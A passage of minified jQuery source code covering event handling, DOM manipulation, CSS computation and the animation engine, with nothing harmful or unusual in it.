e&&(t=e,e=void 0),e=e||"fx";while(a--)(n=J.get(o[a],e+"queueHooks"))&&n.empty&&(r++,n.empty.add(s));return s(),i.promise(t)}});var re=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,ie=new RegExp("^(?:([+-])=|)("+re+")([a-z%]*)$","i"),oe=["Top","Right","Bottom","Left"],ae=function(e,t){return"none"===(e=t||e).style.display||""===e.style.display&&w.contains(e.ownerDocument,e)&&"none"===w.css(e,"display")},se=function(e,t,n,r){var i,o,a={};for(o in t)a[o]=e.style[o],e.style[o]=t[o];i=n.apply(e,r||[]);for(o in t)e.style[o]=a[o];return i};function ue(e,t,n,r){var i,o,a=20,s=r?function(){return r.cur()}:function(){return w.css(e,t,"")},u=s(),l=n&&n[3]||(w.cssNumber[t]?"":"px"),c=(w.cssNumber[t]||"px"!==l&&+u)&&ie.exec(w.css(e,t));if(c&&c[3]!==l){u/=2,l=l||c[3],c=+u||1;while(a--)w.style(e,t,c+l),(1-o)*(1-(o=s()/u||.5))<=0&&(a=0),c/=o;c*=2,w.style(e,t,c+l),n=n||[]}return n&&(c=+c||+u||0,i=n[1]?c+(n[1]+1)*n[2]:+n[2],r&&(r.unit=l,r.start=c,r.end=i)),i}var le={};function ce(e){var t,n=e.ownerDocument,r=e.nodeName,i=le[r];return i||(t=n.body.appendChild(n.createElement(r)),i=w.css(t,"display"),t.parentNode.removeChild(t),"none"===i&&(i="block"),le[r]=i,i)}function fe(e,t){for(var n,r,i=[],o=0,a=e.length;o<a;o++)(r=e[o]).style&&(n=r.style.display,t?("none"===n&&(i[o]=J.get(r,"display")||null,i[o]||(r.style.display="")),""===r.style.display&&ae(r)&&(i[o]=ce(r))):"none"!==n&&(i[o]="none",J.set(r,"display",n)));for(o=0;o<a;o++)null!=i[o]&&(e[o].style.display=i[o]);return e}w.fn.extend({show:function(){return fe(this,!0)},hide:function(){return fe(this)},toggle:function(e){return"boolean"==typeof e?e?this.show():this.hide():this.each(function(){ae(this)?w(this).show():w(this).hide()})}});var pe=/^(?:checkbox|radio)$/i,de=/<([a-z][^\/\0>\x20\t\r\n\f]+)/i,he=/^$|^module$|\/(?:java|ecma)script/i,ge={option:[1,"<select multiple='multiple'>","</select>"],thead:[1,"<table>","</table>"],col:[2,"<table><colgroup>","</colgroup></table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],_default:[0,"",""]};ge.optgroup=ge.option,ge.tbody=ge.tfoot=ge.colgroup=ge.caption=ge.thead,ge.th=ge.td;function ye(e,t){var n;return n="undefined"!=typeof e.getElementsByTagName?e.getElementsByTagName(t||"*"):"undefined"!=typeof e.querySelectorAll?e.querySelectorAll(t||"*"):[],void 0===t||t&&N(e,t)?w.merge([e],n):n}function ve(e,t){for(var n=0,r=e.length;n<r;n++)J.set(e[n],"globalEval",!t||J.get(t[n],"globalEval"))}var me=/<|&#?\w+;/;function xe(e,t,n,r,i){for(var o,a,s,u,l,c,f=t.createDocumentFragment(),p=[],d=0,h=e.length;d<h;d++)if((o=e[d])||0===o)if("object"===x(o))w.merge(p,o.nodeType?[o]:o);else if(me.test(o)){a=a||f.appendChild(t.createElement("div")),s=(de.exec(o)||["",""])[1].toLowerCase(),u=ge[s]||ge._default,a.innerHTML=u[1]+w.htmlPrefilter(o)+u[2],c=u[0];while(c--)a=a.lastChild;w.merge(p,a.childNodes),(a=f.firstChild).textContent=""}else p.push(t.createTextNode(o));f.textContent="",d=0;while(o=p[d++])if(r&&w.inArray(o,r)>-1)i&&i.push(o);else if(l=w.contains(o.ownerDocument,o),a=ye(f.appendChild(o),"script"),l&&ve(a),n){c=0;while(o=a[c++])he.test(o.type||"")&&n.push(o)}return f}!function(){var e=r.createDocumentFragment().appendChild(r.createElement("div")),t=r.createElement("input");t.setAttribute("type","radio"),t.setAttribute("checked","checked"),t.setAttribute("name","t"),e.appendChild(t),h.checkClone=e.cloneNode(!0).cloneNode(!0).lastChild.checked,e.innerHTML="<textarea>x</textarea>",h.noCloneChecked=!!e.cloneNode(!0).lastChild.defaultValue}();var be=r.documentElement,we=/^key/,Te=/^(?:mouse|pointer|contextmenu|drag|drop)|click/,Ce=/^([^.]*)(?:\.(.+)|)/;function Ee(){return!0}function ke(){return!1}function Se(){try{return r.activeElement}catch(e){}}function De(e,t,n,r,i,o){var a,s;if("object"==typeof t){"string"!=typeof n&&(r=r||n,n=void 0);for(s in t)De(e,s,n,r,t[s],o);return e}if(null==r&&null==i?(i=n,r=n=void 0):null==i&&("string"==typeof n?(i=r,r=void 0):(i=r,r=n,n=void 0)),!1===i)i=ke;else if(!i)return e;return 1===o&&(a=i,(i=function(e){return w().off(e),a.apply(this,arguments)}).guid=a.guid||(a.guid=w.guid++)),e.each(function(){w.event.add(this,t,i,r,n)})}w.event={global:{},add:function(e,t,n,r,i){var o,a,s,u,l,c,f,p,d,h,g,y=J.get(e);if(y){n.handler&&(n=(o=n).handler,i=o.selector),i&&w.find.matchesSelector(be,i),n.guid||(n.guid=w.guid++),(u=y.events)||(u=y.events={}),(a=y.handle)||(a=y.handle=function(t){return"undefined"!=typeof w&&w.event.triggered!==t.type?w.event.dispatch.apply(e,arguments):void 0}),l=(t=(t||"").match(M)||[""]).length;while(l--)d=g=(s=Ce.exec(t[l])||[])[1],h=(s[2]||"").split(".").sort(),d&&(f=w.event.special[d]||{},d=(i?f.delegateType:f.bindType)||d,f=w.event.special[d]||{},c=w.extend({type:d,origType:g,data:r,handler:n,guid:n.guid,selector:i,needsContext:i&&w.expr.match.needsContext.test(i),namespace:h.join(".")},o),(p=u[d])||((p=u[d]=[]).delegateCount=0,f.setup&&!1!==f.setup.call(e,r,h,a)||e.addEventListener&&e.addEventListener(d,a)),f.add&&(f.add.call(e,c),c.handler.guid||(c.handler.guid=n.guid)),i?p.splice(p.delegateCount++,0,c):p.push(c),w.event.global[d]=!0)}},remove:function(e,t,n,r,i){var o,a,s,u,l,c,f,p,d,h,g,y=J.hasData(e)&&J.get(e);if(y&&(u=y.events)){l=(t=(t||"").match(M)||[""]).length;while(l--)if(s=Ce.exec(t[l])||[],d=g=s[1],h=(s[2]||"").split(".").sort(),d){f=w.event.special[d]||{},p=u[d=(r?f.delegateType:f.bindType)||d]||[],s=s[2]&&new RegExp("(^|\\.)"+h.join("\\.(?:.*\\.|)")+"(\\.|$)"),a=o=p.length;while(o--)c=p[o],!i&&g!==c.origType||n&&n.guid!==c.guid||s&&!s.test(c.namespace)||r&&r!==c.selector&&("**"!==r||!c.selector)||(p.splice(o,1),c.selector&&p.delegateCount--,f.remove&&f.remove.call(e,c));a&&!p.length&&(f.teardown&&!1!==f.teardown.call(e,h,y.handle)||w.removeEvent(e,d,y.handle),delete u[d])}else for(d in u)w.event.remove(e,d+t[l],n,r,!0);w.isEmptyObject(u)&&J.remove(e,"handle events")}},dispatch:function(e){var t=w.event.fix(e),n,r,i,o,a,s,u=new Array(arguments.length),l=(J.get(this,"events")||{})[t.type]||[],c=w.event.special[t.type]||{};for(u[0]=t,n=1;n<arguments.length;n++)u[n]=arguments[n];if(t.delegateTarget=this,!c.preDispatch||!1!==c.preDispatch.call(this,t)){s=w.event.handlers.call(this,t,l),n=0;while((o=s[n++])&&!t.isPropagationStopped()){t.currentTarget=o.elem,r=0;while((a=o.handlers[r++])&&!t.isImmediatePropagationStopped())t.rnamespace&&!t.rnamespace.test(a.namespace)||(t.handleObj=a,t.data=a.data,void 0!==(i=((w.event.special[a.origType]||{}).handle||a.handler).apply(o.elem,u))&&!1===(t.result=i)&&(t.preventDefault(),t.stopPropagation()))}return c.postDispatch&&c.postDispatch.call(this,t),t.result}},handlers:function(e,t){var n,r,i,o,a,s=[],u=t.delegateCount,l=e.target;if(u&&l.nodeType&&!("click"===e.type&&e.button>=1))for(;l!==this;l=l.parentNode||this)if(1===l.nodeType&&("click"!==e.type||!0!==l.disabled)){for(o=[],a={},n=0;n<u;n++)void 0===a[i=(r=t[n]).selector+" "]&&(a[i]=r.needsContext?w(i,this).index(l)>-1:w.find(i,this,null,[l]).length),a[i]&&o.push(r);o.length&&s.push({elem:l,handlers:o})}return l=this,u<t.length&&s.push({elem:l,handlers:t.slice(u)}),s},addProp:function(e,t){Object.defineProperty(w.Event.prototype,e,{enumerable:!0,configurable:!0,get:g(t)?function(){if(this.originalEvent)return t(this.originalEvent)}:function(){if(this.originalEvent)return this.originalEvent[e]},set:function(t){Object.defineProperty(this,e,{enumerable:!0,configurable:!0,writable:!0,value:t})}})},fix:function(e){return e[w.expando]?e:new w.Event(e)},special:{load:{noBubble:!0},focus:{trigger:function(){if(this!==Se()&&this.focus)return this.focus(),!1},delegateType:"focusin"},blur:{trigger:function(){if(this===Se()&&this.blur)return this.blur(),!1},delegateType:"focusout"},click:{trigger:function(){if("checkbox"===this.type&&this.click&&N(this,"input"))return this.click(),!1},_default:function(e){return N(e.target,"a")}},beforeunload:{postDispatch:function(e){void 0!==e.result&&e.originalEvent&&(e.originalEvent.returnValue=e.result)}}}},w.removeEvent=function(e,t,n){e.removeEventListener&&e.removeEventListener(t,n)},w.Event=function(e,t){if(!(this instanceof w.Event))return new w.Event(e,t);e&&e.type?(this.originalEvent=e,this.type=e.type,this.isDefaultPrevented=e.defaultPrevented||void 0===e.defaultPrevented&&!1===e.returnValue?Ee:ke,this.target=e.target&&3===e.target.nodeType?e.target.parentNode:e.target,this.currentTarget=e.currentTarget,this.relatedTarget=e.relatedTarget):this.type=e,t&&w.extend(this,t),this.timeStamp=e&&e.timeStamp||Date.now(),this[w.expando]=!0},w.Event.prototype={constructor:w.Event,isDefaultPrevented:ke,isPropagationStopped:ke,isImmediatePropagationStopped:ke,isSimulated:!1,preventDefault:function(){var e=this.originalEvent;this.isDefaultPrevented=Ee,e&&!this.isSimulated&&e.preventDefault()},stopPropagation:function(){var e=this.originalEvent;this.isPropagationStopped=Ee,e&&!this.isSimulated&&e.stopPropagation()},stopImmediatePropagation:function(){var e=this.originalEvent;this.isImmediatePropagationStopped=Ee,e&&!this.isSimulated&&e.stopImmediatePropagation(),this.stopPropagation()}},w.each({altKey:!0,bubbles:!0,cancelable:!0,changedTouches:!0,ctrlKey:!0,detail:!0,eventPhase:!0,metaKey:!0,pageX:!0,pageY:!0,shiftKey:!0,view:!0,"char":!0,charCode:!0,key:!0,keyCode:!0,button:!0,buttons:!0,clientX:!0,clientY:!0,offsetX:!0,offsetY:!0,pointerId:!0,pointerType:!0,screenX:!0,screenY:!0,targetTouches:!0,toElement:!0,touches:!0,which:function(e){var t=e.button;return null==e.which&&we.test(e.type)?null!=e.charCode?e.charCode:e.keyCode:!e.which&&void 0!==t&&Te.test(e.type)?1&t?1:2&t?3:4&t?2:0:e.which}},w.event.addProp),w.each({mouseenter:"mouseover",mouseleave:"mouseout",pointerenter:"pointerover",pointerleave:"pointerout"},function(e,t){w.event.special[e]={delegateType:t,bindType:t,handle:function(e){var n,r=this,i=e.relatedTarget,o=e.handleObj;return i&&(i===r||w.contains(r,i))||(e.type=o.origType,n=o.handler.apply(this,arguments),e.type=t),n}}}),w.fn.extend({on:function(e,t,n,r){return De(this,e,t,n,r)},one:function(e,t,n,r){return De(this,e,t,n,r,1)},off:function(e,t,n){var r,i;if(e&&e.preventDefault&&e.handleObj)return r=e.handleObj,w(e.delegateTarget).off(r.namespace?r.origType+"."+r.namespace:r.origType,r.selector,r.handler),this;if("object"==typeof e){for(i in e)this.off(i,t,e[i]);return this}return!1!==t&&"function"!=typeof t||(n=t,t=void 0),!1===n&&(n=ke),this.each(function(){w.event.remove(this,e,n,t)})}});var Ne=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi,Ae=/<script|<style|<link/i,je=/checked\s*(?:[^=]|=\s*.checked.)/i,qe=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g;function Le(e,t){return N(e,"table")&&N(11!==t.nodeType?t:t.firstChild,"tr")?w(e).children("tbody")[0]||e:e}function He(e){return e.type=(null!==e.getAttribute("type"))+"/"+e.type,e}function Oe(e){return"true/"===(e.type||"").slice(0,5)?e.type=e.type.slice(5):e.removeAttribute("type"),e}function Pe(e,t){var n,r,i,o,a,s,u,l;if(1===t.nodeType){if(J.hasData(e)&&(o=J.access(e),a=J.set(t,o),l=o.events)){delete a.handle,a.events={};for(i in l)for(n=0,r=l[i].length;n<r;n++)w.event.add(t,i,l[i][n])}K.hasData(e)&&(s=K.access(e),u=w.extend({},s),K.set(t,u))}}function Me(e,t){var n=t.nodeName.toLowerCase();"input"===n&&pe.test(e.type)?t.checked=e.checked:"input"!==n&&"textarea"!==n||(t.defaultValue=e.defaultValue)}function Re(e,t,n,r){t=a.apply([],t);var i,o,s,u,l,c,f=0,p=e.length,d=p-1,y=t[0],v=g(y);if(v||p>1&&"string"==typeof y&&!h.checkClone&&je.test(y))return e.each(function(i){var o=e.eq(i);v&&(t[0]=y.call(this,i,o.html())),Re(o,t,n,r)});if(p&&(i=xe(t,e[0].ownerDocument,!1,e,r),o=i.firstChild,1===i.childNodes.length&&(i=o),o||r)){for(u=(s=w.map(ye(i,"script"),He)).length;f<p;f++)l=i,f!==d&&(l=w.clone(l,!0,!0),u&&w.merge(s,ye(l,"script"))),n.call(e[f],l,f);if(u)for(c=s[s.length-1].ownerDocument,w.map(s,Oe),f=0;f<u;f++)l=s[f],he.test(l.type||"")&&!J.access(l,"globalEval")&&w.contains(c,l)&&(l.src&&"module"!==(l.type||"").toLowerCase()?w._evalUrl&&w._evalUrl(l.src):m(l.textContent.replace(qe,""),c,l))}return e}function Ie(e,t,n){for(var r,i=t?w.filter(t,e):e,o=0;null!=(r=i[o]);o++)n||1!==r.nodeType||w.cleanData(ye(r)),r.parentNode&&(n&&w.contains(r.ownerDocument,r)&&ve(ye(r,"script")),r.parentNode.removeChild(r));return e}w.extend({htmlPrefilter:function(e){return e.replace(Ne,"<$1></$2>")},clone:function(e,t,n){var r,i,o,a,s=e.cloneNode(!0),u=w.contains(e.ownerDocument,e);if(!(h.noCloneChecked||1!==e.nodeType&&11!==e.nodeType||w.isXMLDoc(e)))for(a=ye(s),r=0,i=(o=ye(e)).length;r<i;r++)Me(o[r],a[r]);if(t)if(n)for(o=o||ye(e),a=a||ye(s),r=0,i=o.length;r<i;r++)Pe(o[r],a[r]);else Pe(e,s);return(a=ye(s,"script")).length>0&&ve(a,!u&&ye(e,"script")),s},cleanData:function(e){for(var t,n,r,i=w.event.special,o=0;void 0!==(n=e[o]);o++)if(Y(n)){if(t=n[J.expando]){if(t.events)for(r in t.events)i[r]?w.event.remove(n,r):w.removeEvent(n,r,t.handle);n[J.expando]=void 0}n[K.expando]&&(n[K.expando]=void 0)}}}),w.fn.extend({detach:function(e){return Ie(this,e,!0)},remove:function(e){return Ie(this,e)},text:function(e){return z(this,function(e){return void 0===e?w.text(this):this.empty().each(function(){1!==this.nodeType&&11!==this.nodeType&&9!==this.nodeType||(this.textContent=e)})},null,e,arguments.length)},append:function(){return Re(this,arguments,function(e){1!==this.nodeType&&11!==this.nodeType&&9!==this.nodeType||Le(this,e).appendChild(e)})},prepend:function(){return Re(this,arguments,function(e){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var t=Le(this,e);t.insertBefore(e,t.firstChild)}})},before:function(){return Re(this,arguments,function(e){this.parentNode&&this.parentNode.insertBefore(e,this)})},after:function(){return Re(this,arguments,function(e){this.parentNode&&this.parentNode.insertBefore(e,this.nextSibling)})},empty:function(){for(var e,t=0;null!=(e=this[t]);t++)1===e.nodeType&&(w.cleanData(ye(e,!1)),e.textContent="");return this},clone:function(e,t){return e=null!=e&&e,t=null==t?e:t,this.map(function(){return w.clone(this,e,t)})},html:function(e){return z(this,function(e){var t=this[0]||{},n=0,r=this.length;if(void 0===e&&1===t.nodeType)return t.innerHTML;if("string"==typeof e&&!Ae.test(e)&&!ge[(de.exec(e)||["",""])[1].toLowerCase()]){e=w.htmlPrefilter(e);try{for(;n<r;n++)1===(t=this[n]||{}).nodeType&&(w.cleanData(ye(t,!1)),t.innerHTML=e);t=0}catch(e){}}t&&this.empty().append(e)},null,e,arguments.length)},replaceWith:function(){var e=[];return Re(this,arguments,function(t){var n=this.parentNode;w.inArray(this,e)<0&&(w.cleanData(ye(this)),n&&n.replaceChild(t,this))},e)}}),w.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(e,t){w.fn[e]=function(e){for(var n,r=[],i=w(e),o=i.length-1,a=0;a<=o;a++)n=a===o?this:this.clone(!0),w(i[a])[t](n),s.apply(r,n.get());return this.pushStack(r)}});var We=new RegExp("^("+re+")(?!px)[a-z%]+$","i"),$e=function(t){var n=t.ownerDocument.defaultView;return n&&n.opener||(n=e),n.getComputedStyle(t)},Be=new RegExp(oe.join("|"),"i");!function(){function t(){if(c){l.style.cssText="position:absolute;left:-11111px;width:60px;margin-top:1px;padding:0;border:0",c.style.cssText="position:relative;display:block;box-sizing:border-box;overflow:scroll;margin:auto;border:1px;padding:1px;width:60%;top:1%",be.appendChild(l).appendChild(c);var t=e.getComputedStyle(c);i="1%"!==t.top,u=12===n(t.marginLeft),c.style.right="60%",s=36===n(t.right),o=36===n(t.width),c.style.position="absolute",a=36===c.offsetWidth||"absolute",be.removeChild(l),c=null}}function n(e){return Math.round(parseFloat(e))}var i,o,a,s,u,l=r.createElement("div"),c=r.createElement("div");c.style&&(c.style.backgroundClip="content-box",c.cloneNode(!0).style.backgroundClip="",h.clearCloneStyle="content-box"===c.style.backgroundClip,w.extend(h,{boxSizingReliable:function(){return t(),o},pixelBoxStyles:function(){return t(),s},pixelPosition:function(){return t(),i},reliableMarginLeft:function(){return t(),u},scrollboxSize:function(){return t(),a}}))}();function Fe(e,t,n){var r,i,o,a,s=e.style;return(n=n||$e(e))&&(""!==(a=n.getPropertyValue(t)||n[t])||w.contains(e.ownerDocument,e)||(a=w.style(e,t)),!h.pixelBoxStyles()&&We.test(a)&&Be.test(t)&&(r=s.width,i=s.minWidth,o=s.maxWidth,s.minWidth=s.maxWidth=s.width=a,a=n.width,s.width=r,s.minWidth=i,s.maxWidth=o)),void 0!==a?a+"":a}function _e(e,t){return{get:function(){if(!e())return(this.get=t).apply(this,arguments);delete this.get}}}var ze=/^(none|table(?!-c[ea]).+)/,Xe=/^--/,Ue={position:"absolute",visibility:"hidden",display:"block"},Ve={letterSpacing:"0",fontWeight:"400"},Ge=["Webkit","Moz","ms"],Ye=r.createElement("div").style;function Qe(e){if(e in Ye)return e;var t=e[0].toUpperCase()+e.slice(1),n=Ge.length;while(n--)if((e=Ge[n]+t)in Ye)return e}function Je(e){var t=w.cssProps[e];return t||(t=w.cssProps[e]=Qe(e)||e),t}function Ke(e,t,n){var r=ie.exec(t);return r?Math.max(0,r[2]-(n||0))+(r[3]||"px"):t}function Ze(e,t,n,r,i,o){var a="width"===t?1:0,s=0,u=0;if(n===(r?"border":"content"))return 0;for(;a<4;a+=2)"margin"===n&&(u+=w.css(e,n+oe[a],!0,i)),r?("content"===n&&(u-=w.css(e,"padding"+oe[a],!0,i)),"margin"!==n&&(u-=w.css(e,"border"+oe[a]+"Width",!0,i))):(u+=w.css(e,"padding"+oe[a],!0,i),"padding"!==n?u+=w.css(e,"border"+oe[a]+"Width",!0,i):s+=w.css(e,"border"+oe[a]+"Width",!0,i));return!r&&o>=0&&(u+=Math.max(0,Math.ceil(e["offset"+t[0].toUpperCase()+t.slice(1)]-o-u-s-.5))),u}function et(e,t,n){var r=$e(e),i=Fe(e,t,r),o="border-box"===w.css(e,"boxSizing",!1,r),a=o;if(We.test(i)){if(!n)return i;i="auto"}return a=a&&(h.boxSizingReliable()||i===e.style[t]),("auto"===i||!parseFloat(i)&&"inline"===w.css(e,"display",!1,r))&&(i=e["offset"+t[0].toUpperCase()+t.slice(1)],a=!0),(i=parseFloat(i)||0)+Ze(e,t,n||(o?"border":"content"),a,r,i)+"px"}w.extend({cssHooks:{opacity:{get:function(e,t){if(t){var n=Fe(e,"opacity");return""===n?"1":n}}}},cssNumber:{animationIterationCount:!0,columnCount:!0,fillOpacity:!0,flexGrow:!0,flexShrink:!0,fontWeight:!0,lineHeight:!0,opacity:!0,order:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{},style:function(e,t,n,r){if(e&&3!==e.nodeType&&8!==e.nodeType&&e.style){var i,o,a,s=G(t),u=Xe.test(t),l=e.style;if(u||(t=Je(s)),a=w.cssHooks[t]||w.cssHooks[s],void 0===n)return a&&"get"in a&&void 0!==(i=a.get(e,!1,r))?i:l[t];"string"==(o=typeof n)&&(i=ie.exec(n))&&i[1]&&(n=ue(e,t,i),o="number"),null!=n&&n===n&&("number"===o&&(n+=i&&i[3]||(w.cssNumber[s]?"":"px")),h.clearCloneStyle||""!==n||0!==t.indexOf("background")||(l[t]="inherit"),a&&"set"in a&&void 0===(n=a.set(e,n,r))||(u?l.setProperty(t,n):l[t]=n))}},css:function(e,t,n,r){var i,o,a,s=G(t);return Xe.test(t)||(t=Je(s)),(a=w.cssHooks[t]||w.cssHooks[s])&&"get"in a&&(i=a.get(e,!0,n)),void 0===i&&(i=Fe(e,t,r)),"normal"===i&&t in Ve&&(i=Ve[t]),""===n||n?(o=parseFloat(i),!0===n||isFinite(o)?o||0:i):i}}),w.each(["height","width"],function(e,t){w.cssHooks[t]={get:function(e,n,r){if(n)return!ze.test(w.css(e,"display"))||e.getClientRects().length&&e.getBoundingClientRect().width?et(e,t,r):se(e,Ue,function(){return et(e,t,r)})},set:function(e,n,r){var i,o=$e(e),a="border-box"===w.css(e,"boxSizing",!1,o),s=r&&Ze(e,t,r,a,o);return a&&h.scrollboxSize()===o.position&&(s-=Math.ceil(e["offset"+t[0].toUpperCase()+t.slice(1)]-parseFloat(o[t])-Ze(e,t,"border",!1,o)-.5)),s&&(i=ie.exec(n))&&"px"!==(i[3]||"px")&&(e.style[t]=n,n=w.css(e,t)),Ke(e,n,s)}}}),w.cssHooks.marginLeft=_e(h.reliableMarginLeft,function(e,t){if(t)return(parseFloat(Fe(e,"marginLeft"))||e.getBoundingClientRect().left-se(e,{marginLeft:0},function(){return e.getBoundingClientRect().left}))+"px"}),w.each({margin:"",padding:"",border:"Width"},function(e,t){w.cssHooks[e+t]={expand:function(n){for(var r=0,i={},o="string"==typeof n?n.split(" "):[n];r<4;r++)i[e+oe[r]+t]=o[r]||o[r-2]||o[0];return i}},"margin"!==e&&(w.cssHooks[e+t].set=Ke)}),w.fn.extend({css:function(e,t){return z(this,function(e,t,n){var r,i,o={},a=0;if(Array.isArray(t)){for(r=$e(e),i=t.length;a<i;a++)o[t[a]]=w.css(e,t[a],!1,r);return o}return void 0!==n?w.style(e,t,n):w.css(e,t)},e,t,arguments.length>1)}});function tt(e,t,n,r,i){return new tt.prototype.init(e,t,n,r,i)}w.Tween=tt,tt.prototype={constructor:tt,init:function(e,t,n,r,i,o){this.elem=e,this.prop=n,this.easing=i||w.easing._default,this.options=t,this.start=this.now=this.cur(),this.end=r,this.unit=o||(w.cssNumber[n]?"":"px")},cur:function(){var e=tt.propHooks[this.prop];return e&&e.get?e.get(this):tt.propHooks._default.get(this)},run:function(e){var t,n=tt.propHooks[this.prop];return this.options.duration?this.pos=t=w.easing[this.easing](e,this.options.duration*e,0,1,this.options.duration):this.pos=t=e,this.now=(this.end-this.start)*t+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),n&&n.set?n.set(this):tt.propHooks._default.set(this),this}},tt.prototype.init.prototype=tt.prototype,tt.propHooks={_default:{get:function(e){var t;return 1!==e.elem.nodeType||null!=e.elem[e.prop]&&null==e.elem.style[e.prop]?e.elem[e.prop]:(t=w.css(e.elem,e.prop,""))&&"auto"!==t?t:0},set:function(e){w.fx.step[e.prop]?w.fx.step[e.prop](e):1!==e.elem.nodeType||null==e.elem.style[w.cssProps[e.prop]]&&!w.cssHooks[e.prop]?e.elem[e.prop]=e.now:w.style(e.elem,e.prop,e.now+e.unit)}}},tt.propHooks.scrollTop=tt.propHooks.scrollLeft={set:function(e){e.elem.nodeType&&e.elem.parentNode&&(e.elem[e.prop]=e.now)}},w.easing={linear:function(e){return e},swing:function(e){return.5-Math.cos(e*Math.PI)/2},_default:"swing"},w.fx=tt.prototype.init,w.fx.step={};var nt,rt,it=/^(?:toggle|show|hide)$/,ot=/queueHooks$/;function at(){rt&&(!1===r.hidden&&e.requestAnimationFrame?e.requestAnimationFrame(at):e.setTimeout(at,w.fx.interval),w.fx.tick())}function st(){return e.setTimeout(function(){nt=void 0}),nt=Date.now()}function ut(e,t){var n,r=0,i={height:e};for(t=t?1:0;r<4;r+=2-t)i["margin"+(n=oe[r])]=i["padding"+n]=e;return t&&(i.opacity=i.width=e),i}function lt(e,t,n){for(var r,i=(pt.tweeners[t]||[]).concat(pt.tweeners["*"]),o=0,a=i.length;o<a;o++)if(r=i[o].call(n,t,e))return r}function ct(e,t,n){var r,i,o,a,s,u,l,c,f="width"in t||"height"in t,p=this,d={},h=e.style,g=e.nodeType&&ae(e),y=J.get(e,"fxshow");n.queue||(null==(a=w._queueHooks(e,"fx")).unqueued&&(a.unqueued=0,s=a.empty.fire,a.empty.fire=function(){a.unqueued||s()}),a.unqueued++,p.always(function(){p.always(function(){a.unqueued--,w.queue(e,"fx").length||a.empty.fire()})}));for(r in t)if(i=t[r],it.test(i)){if(delete t[r],o=o||"toggle"===i,i===(g?"hide":"show")){if("show"!==i||!y||void 0===y[r])continue;g=!0}d[r]=y&&y[r]||w.style(e,r)}if((u=!w.isEmptyObject(t))||!w.isEmptyObject(d)){f&&1===e.nodeType&&(n.overflow=[h.overflow,h.overflowX,h.overflowY],null==(l=y&&y.display)&&(l=J.get(e,"display")),"none"===(c=w.css(e,"display"))&&(l?c=l:(fe([e],!0),l=e.style.display||l,c=w.css(e,"display"),fe([e]))),("inline"===c||"inline-block"===c&&null!=l)&&"none"===w.css(e,"float")&&(u||(p.done(function(){h.display=l}),null==l&&(c=h.display,l="none"===c?"":c)),h.display="inline-block")),n.overflow&&(h.overflow="hidden",p.always(function(){h.overflow=n.overflow[0],h.overflowX=n.overflow[1],h.overflowY=n.overflow[2]})),u=!1;for(r in d)u||(y?"hidden"in y&&(g=y.hidden):y=J.access(e,"fxshow",{display:l}),o&&(y.hidden=!g),g&&fe([e],!0),p.done(function(){g||fe([e]),J.remove(e,"fxshow");for(r in d)w.style(e,r,d[r])})),u=lt(g?y[r]:0,r,p),r in y||(y[r]=u.start,g&&(u.end=u.start,u.start=0))}}function ft(e,t){var n,r,i,o,a;for(n in e)if(r=G(n),i=t[r],o=e[n],Array.isArray(o)&&(i=o[1],o=e[n]=o[0]),n!==r&&(e[r]=o,delete e[n]),(a=w.cssHooks[r])&&"expand"in a){o=a.expand(o),delete e[r];for(n in o)n in e||(e[n]=o[n],t[n]=i)}else t[r]=i}function pt(e,t,n){var r,i,o=0,a=pt.prefilters.length,s=w.Deferred().always(function(){delete u.elem}),u=function(){if(i)return!1;for(var t=nt||st(),n=Math.max(0,l.startTime+l.duration-t),r=1-(n/l.duration||0),o=0,a=l.tweens.length;o<a;o++)l.tweens[o].run(r);return s.notifyWith(e,[l,r,n]),r<1&&a?n:(a||s.notifyWith(e,[l,1,0]),s.resolveWith(e,[l]),!1)},l=s.promise({elem:e,props:w.extend({},t),opts:w.extend(!0,{specialEasing:{},easing:w.easing._default},n),originalProperties:t,originalOptions:n,startTime:nt||st(),duration:n.duration,tweens:[],createTween:function(t,n){var r=w.Tween(e,l.opts,t,n,l.opts.specialEasing[t]||l.opts.easing);return l.tweens.push(r),r},stop:function(t){var n=0,r=t?l.tweens.length:0;if(i)return this;for(i=!0;n<r;n++)l.tweens[n].run(1);return t?(s.notifyWith(e,[l,1,0]),s.resolveWith(e,[l,t])):s.rejectWith(e,[l,t]),this}}),c=l.props;for(ft(c,l.opts.specialEasing);o<a;o++)if(r=pt.prefilters[o].call(l,e,c,l.opts))return g(r.stop)&&(w._queueHooks(l.elem,l.opts.queue).stop=r.stop.bind(r)),r;return w.map(c,lt,l),g(l.opts.start)&&l.opts.start.call(e,l),l.progress(l.opts.progress).done(l.opts.done,l.opts.complete).fail(l.opts.fail).always(l.opts.always),w.fx.timer(w.extend(u,{elem:e,anim:l,queue:l.opts.queue})),l}w.Animation=w.extend(pt,{tweeners:{"*":[function(e,t){var n=this.createTween(e,t);return ue(n.elem,e,ie.exec(t),n),n}]},tweener:function(e,t){g(e)?(t=e,e=["*"]):e=e.match(M);for(var n,r=0,i=e.length;r<i;r++)n=e[r],pt.tweeners[n]=pt.tweeners[n]||[],pt.tweeners[n].unshift(t)},prefilters:[ct],prefilter:function(e,t){t?pt.prefilters.unshift(e):pt.prefilters.push(e)}}),w.speed=function(e,t,n){var r=e&&"object"==typeof e?w.extend({},e):{complete:n||!n&&t||g(e)&&e,duration:e,easing:n&&t||t&&!g(t)&&t};return w.fx.off?r.duration=0:"number"!=typeof r.duration&&(r.duration in w.fx.speeds?r.duration=w.fx.speeds[r.duration]:r.duration=w.fx.speeds._default),null!=r.queue&&!0!==r.queue||(r.queue="fx"),r.old=r.complete,r.complete=function(){g(r.old)&&r.old.call(this),r.queue&&w.dequeue(this,r.queue)},r},w.fn.extend({fadeTo:function(e,t,n,r){return this.filter(ae).css("opacity",0).show().end().animate({opacity:t},e,n,r)},animate:function(e,t,n,r){var i=w.isEmptyObject(e),o=w.speed(t,n,r),a=function(){var t=pt(this,w.extend({},e),o);(i||J.get(this,"finish"))&&t.stop(!0)};return a.finish=a,i||!1===o.queue?this.each(a):this.queue(o.queue,a)},stop:function(e,t,n){var r=function(e){var 